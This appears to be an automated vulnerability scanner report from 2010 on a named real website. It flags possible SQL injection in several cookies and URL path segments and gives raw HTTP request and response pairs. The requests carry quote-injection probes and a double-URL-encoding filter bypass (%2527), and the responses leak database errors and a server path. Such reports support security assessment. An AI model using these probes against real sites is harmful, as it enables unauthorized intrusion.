HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:18:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c'; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:20:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c''; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:20:45 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:20:46 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:20:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:15:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:15:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:15:19 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:15:19 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:16:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:16:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:16:22 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:16:22 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The 7876d45a49f537da76cfb9e129203eee cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 7876d45a49f537da76cfb9e129203eee cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the 7876d45a49f537da76cfb9e129203eee cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/89-dont-kill-the-messenger.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:19:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/89-dont-kill-the-messenger.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:19:30 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:19:31 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:19:31 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23821
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/89-dont-kill-the-messenger.html%2527?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:32:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/89-dont-kill-the-messenger.html%2527%2527?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:32:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:32:21 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:32:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23848
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:45:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:45:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:56:57 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:57:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog'/googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 06:29:28 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 06:29:28 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /blog''/googleanalytics/91-google-analytics-cookies-and-domains.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:29:28 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
